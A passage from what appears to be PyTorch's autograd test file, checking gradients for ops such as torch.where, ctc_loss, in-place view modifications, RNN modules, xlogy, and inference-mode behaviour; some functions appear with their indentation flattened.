output = torch.pdist(x, p=2)
# just run a single backward, as gradcheck/gradgradcheck is expensive here
output.sum().backward()
# TODO: see if these tests can be ported to OpInfos or moved to where's test suite
def test_where_functional(self, device):
    """gradcheck/gradgradcheck torch.where with tensor operands, incl. broadcasting."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where(cond, x, y):
        return torch.where(cond, x, y)

    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, device=device)])

    # Broadcasting case.
    x = torch.randn(5, 1, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.randn(5, 5, 1, dtype=torch.double, device=device, requires_grad=True)
    gradcheck(where, [cond, x, y], raise_exception=True)
    gradgradcheck(where, [cond, x, y], [torch.randn(5, 5, 5, device=device)])
def test_where_scalar(self, device):
    """gradcheck torch.where when either branch is a Python scalar."""
    x = torch.randn(5, 5, dtype=torch.double, device=device, requires_grad=True)
    scalar = 4.
    cond = mask_not_all_zeros((5, 5)).to(device=device)

    def where_scalar_first(cond, x):
        return torch.where(cond, scalar, x)

    def where_scalar_second(cond, x):
        return torch.where(cond, x, scalar)

    for fn in (where_scalar_first, where_scalar_second):
        gradcheck(fn, (cond, x))
        gradgradcheck(fn, (cond, x))
@skipCUDAIf(True, """Test is flaky on Linux and Windows, typical error message:
https://github.com/pytorch/pytorch/issues/34870""")
def test_ctc_loss(self, device):
    """gradcheck ctc_loss across varying input/target lengths, incl. zero-length targets."""
    batch_size = 64
    num_labels = 101
    target_length = 15
    gradcheck_input_size = 10

    ZERO_NONE = 0
    ZERO_SOME = 1
    ZERO_ALL = 2
    # Cases: (input_length, vary_lengths, zero_lengths)
    tests = [(150, False, ZERO_NONE),
             (150, True, ZERO_NONE),
             (50, True, ZERO_SOME),
             (50, True, ZERO_ALL)]
    if 'cuda' in device:
        tests += [(50, False, ZERO_NONE),
                  (50, True, ZERO_NONE),
                  (150, True, ZERO_SOME),
                  (150, True, ZERO_ALL)]

    for input_length, vary_lengths, zero_mode in tests:
        targets = torch.randint(1, num_labels, (batch_size, target_length),
                                device=device, dtype=torch.long)
        x = torch.randn(gradcheck_input_size, dtype=torch.double, device=device, requires_grad=True)
        tile_factors = torch.randn(input_length * batch_size * num_labels // gradcheck_input_size + 1,
                                   device=device)
        input_lengths = [(torch.randint(input_length // 2, input_length + 1, ()).item()
                          if vary_lengths or i == 0 else input_length) for i in range(batch_size)]
        if zero_mode == ZERO_ALL:
            target_lengths = [0 for _ in range(batch_size)]
        else:
            target_lengths = [(torch.randint(target_length // 2, target_length + 1, ()).item()
                               if vary_lengths else target_length) for _ in range(batch_size)]
            if zero_mode == ZERO_SOME:
                # Zero out the target length for ten random batch entries.
                idxes = torch.randint(0, batch_size, (10,))
                for i in idxes:
                    target_lengths[i] = 0

        def ctc_after_softmax(x):
            # Tile the small gradcheck input up to the full (T, N, C) shape.
            x_full = ((x[:, None] * tile_factors[None, :]).view(-1)[:input_length * batch_size * num_labels]
                      .view(input_length, batch_size, num_labels))
            log_probs = torch.log_softmax(x_full, 2)
            return torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths)

        gradcheck(ctc_after_softmax, [x])
@onlyCUDA
@skipCUDAIfRocm
@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
    """CuDNN ctc_loss gradient must match the native implementation."""
    batch_size = 16
    input_length = 30
    num_labels = 101
    target_length = 15

    targets = torch.randint(1, num_labels, (batch_size * target_length,),
                            device='cuda', dtype=torch.long)
    log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
    log_probs.requires_grad_()

    input_lengths = batch_size * [input_length]
    target_lengths = batch_size * [target_length]
    grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)

    # Native reference with cudnn disabled.
    with torch.backends.cudnn.flags(enabled=False):
        loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
        grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)

    # int32 CPU targets select the CuDNN path (checked by the grad_fn assert below).
    loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
                                              input_lengths, target_lengths, reduction='none')
    self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
    grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
    self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
    """In-place leaky_relu_/rrelu_ with a negative slope cannot be differentiated."""
    for inplace_fn in (lambda t: torch.nn.functional.leaky_relu_(t, -2),
                       lambda t: torch.nn.functional.rrelu_(t, -5.0, 1.0)):
        a = torch.tensor([-1., 1.], device=device, requires_grad=True)
        b = inplace_fn(a.clone())
        with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
            b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
    """In-place leaky_relu_ with slope 0: subgradient 0 at negative inputs and at 0."""
    a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
    b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
    b.backward(torch.ones(3, device=device))
    self.assertEqual(a.grad, torch.tensor([0., 0., 1.], device=device))
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
    """In-place elu_/celu_ with a negative alpha cannot be differentiated."""
    for inplace_fn in (lambda t: torch.nn.functional.elu_(t, alpha=-2),
                       lambda t: torch.nn.functional.celu_(t, alpha=-2)):
        a = torch.tensor([-1., 1.], device=device, requires_grad=True)
        b = inplace_fn(a.clone())
        with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
            b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
    """Intermediates not needed for backward are freed eagerly."""
    x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
    m = torch.randn(1, 3, 1, 1, device=device)

    z = x.sum()
    base_mem = torch.cuda.memory_allocated()
    z = ((x + 2) * m).sum()
    end_mem = torch.cuda.memory_allocated()

    # In the end the memory usage should remain equal, because neither of
    # (x + 2) and ((x + 2) * m) should be kept alive for backward, while the
    # previous allocation of z had the same size as the current one.
    self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
    """pin_memory(): equal values, distinct tensor, requires_grad preserved, differentiable."""
    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    pinned = x.pin_memory()
    self.assertEqual(x, pinned)
    self.assertIsNot(x, pinned)
    self.assertTrue(pinned.requires_grad)
    gradcheck(lambda x: x.pin_memory(), [x])
    gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
    """Smoke test: emit_nvtx can be constructed and entered without error."""
    # This test is not intended to ensure correctness of nvtx ranges -- that
    # would require collecting a profile in a subprocess and parsing it.
    # It merely catches emit_nvtx breaking on construction.
    a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
    with torch.cuda.profiler.profile():
        with emit_nvtx():
            a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
    """LSTM backward reaches the input even when all weights are frozen (gh-7722)."""
    lstm = torch.nn.LSTM(2, 3).to(device)
    for p in lstm.parameters():
        p.requires_grad = False
    s = torch.randn(1, 1, 2, requires_grad=True, device=device)
    out, _ = lstm(s)
    out.sum().backward()
    self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
    """Undefined gradients on one LSTMCell output don't hamper backward (gh-11872)."""
    cell = torch.nn.LSTMCell(2, 3).to(device).double()
    s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
    for i in range(2):
        out = cell(s)[i]
        out.sum().backward()
        self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
    """Helper: gradcheck/gradgradcheck an RNN module; verify the CuDNN double-backward error."""
    def flatten_out(mod, inp):
        out = mod(inp)
        return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])

    gradcheckfunc = partial(flatten_out, mod)
    with torch.backends.cudnn.flags(enabled=False):
        gradcheck(gradcheckfunc, inp, check_batched_grad=False)
        gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)

    if inp.is_cuda and not TEST_WITH_ROCM:
        # Assert that we have good error message around unsupported CuDNN double backward
        # NB: we trigger double backward using .backward() instead of autograd.grad due to
        # https://github.com/pytorch/pytorch/issues/37874
        with torch.backends.cudnn.flags(enabled=True):
            result = gradcheckfunc(inp)
            result[0].sum().backward(create_graph=True)
            grad0 = next(mod.parameters()).grad
            with self.assertRaisesRegex(RuntimeError,
                                        "please disable the CuDNN backend temporarily"):
                grad0.sum().backward()

            # Here we avoid the backward(create_graph=True) memory leak
            # described in https://github.com/pytorch/pytorch/issues/7343
            for param in mod.parameters():
                param.grad = None
            inp.grad = None
@skipMeta  # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
    """gradcheck/gradgradcheck an LSTM with and without bias."""
    hsize = 4
    inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
    for bias in (True, False):
        mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
        self._test_rnn_mod(mod, inp)
@skipMeta  # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
    """gradcheck/gradgradcheck a GRU with and without bias."""
    hsize = 4
    inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
    for bias in (True, False):
        mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
        self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
    """Subgradients of copysign at (signed) zeros of either argument."""
    # Cases: (x values, y values, expected x.grad); y.grad is always zero.
    cases = [
        ([0.0, 0.0, 0.0], [-1.0, 0.0, 1.0], [0.0, 0.0, 0.0]),     # input is 0.0
        ([-0.0, -0.0, -0.0], [-1.0, 0.0, 1.0], [0.0, 0.0, 0.0]),  # input is -0.0
        ([-1.0, 0.0, 1.0], [0.0, 0.0, 0.0], [-1.0, 0.0, 1.0]),    # other is 0.0
        ([-1.0, 0.0, 1.0], [-0.0, -0.0, -0.0], [1.0, 0.0, -1.0]), # other is -0.0
    ]
    for x_vals, y_vals, expected_x_grad in cases:
        x = torch.tensor(x_vals, dtype=torch.float, device=device, requires_grad=True)
        y = torch.tensor(y_vals, dtype=torch.float, device=device, requires_grad=True)
        out = torch.copysign(x, y)
        out.sum().backward()
        self.assertEqual(x.grad.tolist(), expected_x_grad)
        self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
    """Assigning .grad validates shape, dtype, identity and device."""
    x = torch.randn(5, 5, device=devices[0])

    # Wrong shape must raise.
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(2, 2, device=devices[0])
    # Wrong dtype must raise.
    with self.assertRaises(RuntimeError):
        x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
    # Self-assignment must raise.
    with self.assertRaises(RuntimeError):
        x.grad = x
    # device -> cpu grad assignment must raise.
    if self.device_type != 'cpu':
        with self.assertRaises(RuntimeError):
            t_cpu = torch.rand(5, 5)
            t_cpu.grad = torch.randn(5, 5, device=devices[0])
    # Half type is accepted on CUDA.
    if self.device_type == 'cuda':
        x = x.to(dtype=torch.half, device=devices[0])
        x.grad = torch.zeros_like(x)
    # Cross-device assignment must raise.
    if len(devices) > 1:
        x = torch.randn(5, 5, device=devices[0])
        with self.assertRaises(RuntimeError):
            x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
    """*_like factory functions honor requires_grad/dtype/device arguments."""
    x = torch.randn(2, 3, dtype=dtype, device=devices[0])
    for fn in (torch.ones_like, torch.testing.randn_like):
        for requires_grad in (True, False):
            output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
            self.assertEqual(requires_grad, output.requires_grad)
            self.assertIs(dtype, output.dtype)
            # NOTE(review): this asserts on the *input*'s device string, not
            # output.device — presumably output.device was intended; confirm.
            self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
    """Backward through Broadcast when only the last replica's output is used."""
    from torch.nn.parallel._functions import Broadcast
    x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
    outputs = Broadcast.apply(list(range(len(devices))), x)
    y = outputs[-1] * 2
    y.sum().backward()
    # TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
    self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
    """The device observed inside backward matches the variable's device."""
    seen_device = [None]

    class Identity(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x):
            return x.clone()

        @staticmethod
        def backward(ctx, grad_output):
            seen_device[0] = grad_output.device
            return grad_output.clone()

    v = torch.randn(1, device=devices[1], requires_grad=True)
    Identity.apply(v).backward()
    self.assertEqual(str(seen_device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
    """Gradients from two devices accumulate into one input buffer."""
    input = torch.randn(1, device=devices[0], requires_grad=True)
    output = input.to(device=devices[1]) + input.to(device=devices[1])
    output.backward()
@onlyCPU
def test_copy_(self, device):
    """copy_ and .to() propagate requires_grad for every floating dtype (incl. bfloat16)."""
    # At the time of writing this test, copy_ is not generated from native_functions.yaml
    # there was a bug that bfloat16 was not recognized as floating.
    x = torch.randn(10, device=device, requires_grad=True)
    floating_dtypes = [dt for dt in torch.testing.get_all_dtypes() if dt.is_floating_point]
    for dt in floating_dtypes:
        y = torch.empty(10, device=device, dtype=dt)
        y.copy_(x)
        self.assertTrue(y.requires_grad)
        z = x.to(torch.bfloat16)
        self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
    """Reentrant backward hopping between the CPU and GPU autograd threads."""
    class ReentrantFunc(Function):
        _cpu_mode = True

        @staticmethod
        def forward(ctx, x):
            return x * (x + 2)

        @staticmethod
        def backward(ctx, grad_output):
            with torch.enable_grad():
                if ReentrantFunc._cpu_mode:
                    new_param = torch.randn(2, 2, requires_grad=True)
                    (new_param ** 2).sum().backward()
                else:
                    new_param = torch.randn(2, 2, device=device, requires_grad=True)
                    (new_param ** 2).sum().backward()
            return grad_output

    # Reentrant starts on GPU thread, finishes on GPU thread.
    x = torch.randn(2, 2, device=device, requires_grad=True)
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on CPU thread, finishes on GPU thread.
    x = torch.randn(2, 2, requires_grad=True)
    # Set ReentrantFunc node to GPU to emit tasks to the GPU queue.
    ReentrantFunc._cpu_mode = False
    out = ReentrantFunc.apply(x)
    out.sum().backward()

    # Reentrant starts on GPU thread, finishes on CPU thread.
    x = torch.randn(2, 2, device=device, requires_grad=True)
    # Set ReentrantFunc node to CPU to emit tasks to the CPU queue.
    ReentrantFunc._cpu_mode = True
    out = ReentrantFunc.apply(x)
    out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
    """Empty NodeTask handoff between CPU and GPU ready queues must not segfault."""
    # Output on gpu so that this task will be associated with the gpu thread.
    def fn_on_gpu(inp):
        # Artificially increase the priority of the next op to make sure it runs
        # as soon as we reach it before the ops of branch1.
        dummy = inp * 2 * 2 * 2 * 2
        return inp.to(device=device)

    def parent_on_cpu(inp):
        # Slow branch of ops on gpu so that the work queue for the gpu thread
        # won't empty too quickly. They also have smaller priorities than the
        # ones created by fn_on_gpu.
        branch1 = inp.to(device=device)
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        branch1 = branch1 / branch1
        # Perform checkpoint on cpu tensors. So the last op performed in the reentrant
        # autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
        # So the cpu thread will notify the gpu thread with an empty NodeTask.
        branch2 = checkpoint(fn_on_gpu, inp)
        return branch2 + branch1

    inp = torch.rand(2, requires_grad=True)
    out = parent_on_cpu(inp)
    # This will segfault if the empty NodeTask is not handled properly in the
    # gpu thread ReadyQueue.
    out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
    """Modify a view in place, then backprop through the base."""
    base = torch.randn(2, 2, device=device, requires_grad=True)
    clone = base.clone()
    clone.narrow(0, 0, 1).mul_(2)
    clone.sum().backward()
    self.assertEqual(base.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
    """Modify one view in place, then backprop through a sibling view of the same region."""
    base = torch.randn(2, 2, device=device, requires_grad=True)
    clone = base.clone()
    v1 = clone.narrow(0, 0, 1)
    v2 = clone.narrow(0, 0, 1)
    v1.mul_(2)
    v2.sum().backward()
    self.assertEqual(base.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
    """Modify a view-of-view in place, then backprop through the base."""
    base = torch.randn(2, 2, device=device, requires_grad=True)
    clone = base.clone()
    clone.narrow(0, 0, 1).narrow(1, 1, 1).mul_(2)
    clone.sum().backward()
    self.assertEqual(base.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
    """In-place write to an output of a multi-output view (unbind) must raise."""
    root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
    views = root.clone().unbind()
    with self.assertRaises(RuntimeError):
        views[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
    """In-place write to a view taken of a multi-output view must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    pieces = a.unbind(0)
    view_of_piece = pieces[0].view_as(pieces[0])
    with self.assertRaises(RuntimeError):
        view_of_piece.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
    """In-place write to a multi-output view taken of a view must raise."""
    a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
    pieces = a.view_as(a).unbind(0)
    with self.assertRaises(RuntimeError):
        pieces[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
    """An in-place op with a grad-requiring operand makes the (non-leaf) base require grad."""
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
    b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)

    def func(root, b):
        x = root.clone()
        self.assertFalse(x.requires_grad)
        x.narrow(1, 2, 2).mul_(b)
        self.assertTrue(x.requires_grad)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
    """Modify a view in place and backprop through the view itself."""
    a = torch.tensor([2., 5.], device=device, requires_grad=False)
    b = torch.tensor([3.], device=device, requires_grad=True)
    res = a.narrow(0, 1, 1).mul_(b)
    res.sum().backward()
    self.assertEqual(b.grad.tolist(), [5])
    self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
    """An in-place op that makes the base require grad also upgrades prior views."""
    r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)

    def fn(r):
        x = torch.ones(5, dtype=torch.double, device=device)
        v = x.select(0, 1)
        self.assertFalse(v.requires_grad)
        self.assertIsNone(v.grad_fn)
        x.add_(r)  # v is now dependent on r due to the in-place op on x
        self.assertTrue(v.requires_grad)
        return v

    gradcheck(fn, [r])
    gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
    """In-place modifications of views created through a Python autograd.Function."""
    a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
    b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)

    class PyAdd(torch.autograd.Function):
        @staticmethod
        def forward(ctx, x, y):
            ctx.mark_dirty(x)
            x.add_(y)
            return x

        @staticmethod
        def backward(ctx, grad):
            return grad, grad

    def func(root, b):
        x = root.clone()
        PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
        PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
        return x

    gradcheck(func, [a, b], raise_exception=True)
    go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
    gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
    """In-place write through nested views of a non-contiguous base, backprop through base."""
    base = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
    clone = base.clone()
    clone.narrow(0, 0, 1).narrow(1, 1, 1).mul_(2)
    clone.sum().backward()
    self.assertEqual(base.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
    """Safe multi-view ops reject in-place writes to their outputs."""
    safe_view_fns = [lambda t: t.split(1),
                     lambda t: t.split_with_sizes((1, 1, 1)),
                     lambda t: t.chunk(3)]
    for f in safe_view_fns:
        a = torch.randn(3, 3, device=device, requires_grad=True)
        b = a + a
        s1, s2, s3 = f(b)
        error_msg = 'This view is the output of a function that returns multiple views.'
        with self.assertRaisesRegex(RuntimeError, error_msg):
            s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
    """gradcheck works when the input and output live on different devices."""
    x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
    gradcheck(lambda x: x.to("cpu"), (x,))

    x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
    gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
    """Grad layout matches a dense, non-overlapping leaf; otherwise grads are row-major."""
    # (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
    for fmt_a in (torch.contiguous_format, torch.channels_last):
        for fmt_b in (torch.contiguous_format, torch.channels_last):
            a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
            b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
            a.requires_grad_()
            b.requires_grad_()
            # checks (1) for broadcasted gradients
            a.sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            b.sum().backward()
            self.assertEqual(b.grad.stride(), b.stride())
            # checks (1) for non-broadcasted gradients
            a.grad = None
            b.grad = None
            (a * b).sum().backward()
            self.assertEqual(a.grad.stride(), a.stride())
            self.assertEqual(b.grad.stride(), b.stride())

    # (2) If leaf isn't dense, checks that grads are rowmajor contiguous.
    c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
    c.requires_grad_()
    d = torch.rand((2, 2), device=device)
    # checks (2) for broadcasted gradients
    c.sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
    # checks (2) for non-broadcasted gradients
    c.grad = None
    (c * d).sum().backward()
    self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
    """Run the atleast_* gradcheck helper for all three variants."""
    for torch_fn in (torch.atleast_1d, torch.atleast_2d, torch.atleast_3d):
        self._test_atleast(device, torch_fn)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
    """gradcheck/gradgradcheck torch.xlogy for tensor-tensor and scalar variants."""
    def _tensor_tensor_helper(x, y):
        gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
        gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))

        # Zero out roughly half of x to exercise the x == 0 subgradient.
        with torch.no_grad():
            x = x.clone()
            x[torch.rand_like(x) > 0.5] = 0

        # Fix: `(y)` is not a tuple — spell the one-element input tuple as
        # `(y,)`. (gradcheck also accepts a bare tensor, so behavior is
        # unchanged; same fix applied to the scalar variants below.)
        gradcheck(lambda y: torch.xlogy(x, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(x, y), (y,))

    shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))

    # For broadcastable shapes and scalar.
    for x_shape, y_shape in permutations(shapes, 2):
        x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
        y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)

        _tensor_tensor_helper(x, y)
        _tensor_tensor_helper(y, x)

        gradcheck(lambda y: torch.xlogy(0, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(0, y), (y,))

        gradcheck(lambda y: torch.xlogy(2, y), (y,))
        gradgradcheck(lambda y: torch.xlogy(2, y), (y,))
        gradcheck(lambda y: torch.xlogy(y, 2), (y,))
        gradgradcheck(lambda y: torch.xlogy(y, 2), (y,))

    # Different shape
    x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)

    # Same shape
    x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
    _tensor_tensor_helper(x, y)
    _tensor_tensor_helper(y, x)
    _tensor_tensor_helper(x, x)
    _tensor_tensor_helper(y, y)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
    """Return True iff `tensor` is an inference tensor (has no version counter)."""
    try:
        err_msg = "Inference tensors do not track version counter"
        with self.assertRaisesRegex(RuntimeError, err_msg):
            tensor._version
        return True
    except AssertionError:
        # Fix: dropped the unused `as e` binding. assertRaisesRegex failed,
        # i.e. reading _version did not raise -> a normal tensor.
        return False
def test_inference_mode_context_manager(self):
    """inference_mode() nests correctly and restores the previous state on exit."""
    self.assertFalse(torch.is_inference_mode_enabled())
    with torch.inference_mode():
        self.assertTrue(torch.is_inference_mode_enabled())
        with torch.inference_mode(False):
            self.assertFalse(torch.is_inference_mode_enabled())
        self.assertTrue(torch.is_inference_mode_enabled())
    self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
    """@torch.inference_mode() enables inference mode for the decorated call."""
    @torch.inference_mode()
    def func(x):
        self.assertTrue(torch.is_inference_mode_enabled())
        return x * x

    for requires_grad in (True, False):
        inp = torch.ones(1, 2, 3, requires_grad=requires_grad)
        result = func(inp)
        self.assertTrue(torch.is_inference(result))
        self.assertFalse(result.requires_grad)
def test_inference_mode_tensor_creation(self):
    """Tensors constructed inside inference mode are inference tensors."""
    with torch.inference_mode():
        # New tensors created through constructors are inference tensors.
        c = torch.ones(1, 2, 3)
        self.assertFalse(c.requires_grad)
        self.assertTrue(torch.is_inference(c))

        # requires_grad doesn't change inference-tensor behavior inside InferenceMode.
